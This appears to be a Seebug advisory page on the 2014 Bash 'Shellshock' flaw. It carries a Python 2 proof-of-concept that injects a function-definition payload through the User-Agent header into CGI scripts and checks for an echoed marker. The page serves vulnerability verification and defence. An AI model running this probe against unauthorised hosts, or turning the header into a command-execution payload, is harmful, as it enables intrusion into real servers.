
Bash 4.3 远程命令执行漏洞 (破壳)

🗓️ 26 Sep 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 2370 Views

Bash 4.3 远程命令执行漏洞(破壳):2014年9月24日发现的严重漏洞,远程攻击者可在受影响系统上执行任意代码。

Related
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM Workload Deployer (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
15 Jun 201807:01
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance
17 Jun 201822:30
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
19 Jul 202000:49
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in bash affect IBM Flex System Chassis Management Module (CMM)
31 Jan 201902:25
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect certain Brocade products that IBM resells for use with IBM BladeCenter (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
31 Jan 201901:35
ibm
IBM Security Bulletins
Security Bulletins for IBM Tealeaf Customer Experience offerings
16 Jun 201819:35
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect certain IBM N Series products (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
18 Jun 201800:08
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 5600 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
16 Jun 201813:58
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM PureData System for Operational Analytics (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
18 Oct 201903:50
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM Flex System Manager (FSM): (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187)
31 Jan 201901:30
ibm

                                                #!/usr/bin/env python
# coding=utf-8

import re
import sys
import random
import string
import urllib2

from urlparse import urljoin
from urlparse import urlparse
from urlparse import urlunparse
from posixpath import normpath

from comm import cmdline
from comm import generic


# Static metadata describing this check: identifier, affected application
# and version range, vulnerability class, authorship, dates and reference.
# main() does not read it.
poc_info = dict(
    VulId='1521',
    Name='Bash 4.3 远程命令执行漏洞 POC',
    AppName='Bash',
    AppPowerLink='http://www.gnu.org/software/bash/',
    AppVersion='3.0-4.3',
    VulType='Command Execution',
    Desc='''
            Bash 在解析环境变量时,会解析函数,同时可以运行函数后的语句,造成命令执行。
            ''',
    Author=['zhengdt @ knownsec'],
    VulDate='2014-09-24',
    CreateDate='2014-09-25',
    UpdateDate='2014-09-25',
    References=['https://www.invisiblethreat.ca/2014/09/cve-2014-6271/'],
    Version='1',
)

# Shared input/output record passed to main().
#   URL, Mode, Verbose    -- inputs read by main()
#   Error, Status, Result -- outputs written by main(); Status becomes 1 and
#                            Result['VerifyInfo'] is filled when the check hits
io_info = dict(
    URL='',
    Mode='v',
    Verbose=False,
    Error='',
    Status=0,
    Result={},
)


def main(io_info):
    """Run the Bash environment-variable parsing check and record the outcome.

    Reads 'URL', 'Mode' and 'Verbose' from *io_info*.  Only modes 'v' and 'a'
    do anything, and both take the same path.  The function resolves a
    candidate script URL, sends one request whose User-Agent header holds a
    function-definition string followed by echo commands carrying a random
    marker, and compares the first line of the response body with that marker.

    Results are written back into *io_info*:
      * 'Status' = 1 and 'Result'['VerifyInfo']['URL'] on a match
      * 'Error' when no .cgi/.sh URL was found or any exception occurred

    Always returns None.
    """
    target = io_info.get('URL', '')
    run_mode = io_info.get('Mode', 'v')
    chatty = io_info.get('Verbose', False)

    if run_mode not in ('v', 'a'):
        return

    try:
        vul_url = get_url_need(target)
        # Only CGI-style endpoints are probed; anything else is reported as
        # "no vul url" without sending the test request.
        if not vul_url.endswith(('.cgi', '.sh')):
            io_info['Error'] = '%s - no vul url' % target
            return

        if chatty:
            print('[*] %s - Requesting target url ...' % vul_url)

        # A fresh 50-character marker per run, so a match cannot come from
        # static page content.
        marker = ''.join(random.sample(string.letters + string.digits, 50))
        probe_headers = {
            'User-Agent': '() { :; }; echo; echo X-Bash-Test: %s' % marker,
        }

        try:
            body = urllib2.urlopen(
                urllib2.Request(vul_url, headers=probe_headers)).read()
        except urllib2.HTTPError as e:
            # NOTE(review): urllib2.HTTPError exposes the body through read();
            # `.data` does not look like an attribute it provides, so this
            # branch probably raises and ends up in the outer handler as an
            # 'Error' rather than a verdict -- confirm.
            body = e.data

        if chatty:
            print('[*] %s - Check X-Bash-Test ...' % vul_url)

        # The comparison is exact and splits on '\n' only, so a first line
        # ending in '\r' would not match.
        first_line = body.split('\n')[0]
        if first_line == 'X-Bash-Test: %s' % marker:
            io_info['Status'] = 1
            io_info['Result']['VerifyInfo'] = {'URL': vul_url}

    except Exception as e:
        # Every failure (network, parsing, attribute errors) is folded into
        # the 'Error' field instead of propagating.
        io_info['Error'] = '[*] %s' % str(e)
        return


def get_url(url):
    """Open *url* and return the URL reported by the response object.

    If the server answers with an HTTP error status, the input URL is
    returned unchanged.  Other exceptions (for example connection failures)
    are not caught here.
    """
    try:
        opened = urllib2.urlopen(url)
    except urllib2.HTTPError:
        return url
    return opened.url


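def fix_url(url):
    """Return *url* with an ``http://`` scheme prepended when it has none.

    A URL counts as already having a scheme only when it starts with
    ``http://`` or ``https://`` (case-insensitive).  Testing for the bare
    prefix ``http`` would also match host names that merely begin with those
    letters, such as ``httpd.example.com``, and leave them without a scheme.
    """
    if not url.lower().startswith(('http://', 'https://')):
        url = 'http://%s' % url
    return url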


def get_url_need(url):
    """Resolve *url* to the script URL that should be checked.

    A URL that already ends in ``.cgi`` or ``.sh`` (after fix_url adds a
    scheme if needed) is returned as is.  Otherwise the page is fetched and
    get_link() is asked for a script link found on it; when none is found the
    fetched page URL itself is returned.
    """
    normalized = fix_url(url)
    if normalized.endswith(('.cgi', '.sh')):
        return normalized

    landed = get_url(normalized)
    # Fall back to the page URL when get_link() returns an empty result.
    return get_link(landed) or landed


def get_link(url):
    """Return the first usable script link found on the page at *url*.

    The page body is searched for href/action/src attribute values ending in
    ``.cgi``, ``.sh`` or ``.pl``.  Relative matches are made absolute against
    *url*.  A candidate is accepted when is_url_exist() and isSameDomain()
    both approve it.  Returns '' when nothing qualifies or when any exception
    is raised along the way.

    Note that ``.pl`` links can be returned here although main() only
    proceeds for ``.cgi`` and ``.sh`` URLs.
    """
    try:
        html = urllib2.urlopen(url).read()
        candidates = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', html)
        for candidate in candidates:
            if not candidate.startswith('http'):
                candidate = getAbsoluteURL(url, candidate)
            # The existence check runs first, so the domain check only sees
            # links that did not answer 404.
            if is_url_exist(candidate) and isSameDomain(candidate, url):
                return candidate
    except Exception:
        # Best effort: any fetch or parse failure means "no link found".
        return ''
    return ''


def getAbsoluteURL(base, url):
    """Join *url* onto *base* and return it with a normalised path.

    The path component is passed through posixpath.normpath; all other
    components of the joined URL are kept as they are.
    """
    scheme, netloc, path, params, query, fragment = urlparse(urljoin(base, url))
    return urlunparse((scheme, netloc, normpath(path), params, query, fragment))

def is_url_exist(url):
    """Return False only when requesting *url* yields HTTP 404.

    Any other HTTP error status, and any successful response, counts as
    existing.  Exceptions other than urllib2.HTTPError are not handled here
    and reach the caller.
    """
    try:
        urllib2.urlopen(url)
    except urllib2.HTTPError as e:
        return e.code != 404
    return True


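def isSameDomain(url1, url2):
    """Return True when both URLs name the same host, ignoring port and case.

    The original body began with an unconditional ``return True``, which made
    the comparison below it unreachable and approved every URL.  With the
    comparison active, a link pointing at a different host than the page it
    was found on is rejected, so requests stay on the host that was supplied
    for checking.

    URLs without a host component never match.  Any parsing error yields
    False.
    """
    try:
        # .hostname drops user info and port and is lower-cased by urlparse.
        host1 = urlparse(url1).hostname
        host2 = urlparse(url2).hostname
    except Exception:
        return False
    if not host1 or not host2:
        return False
    return host1 == host2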


if __name__ == "__main__":
    # cmdline and generic come from the project's `comm` package, which is
    # not shown here; presumably cmdline.main() fills io_info from the
    # command line and generic.output() formats the result -- confirm.
    cmdline.main(io_info, usage='', argvs=[])
    verbose_run = io_info['Verbose']
    if verbose_run:
        print('\n[*] Init ...\n')
    main(io_info)
    report = generic.output(io_info)
    print(report)

                              
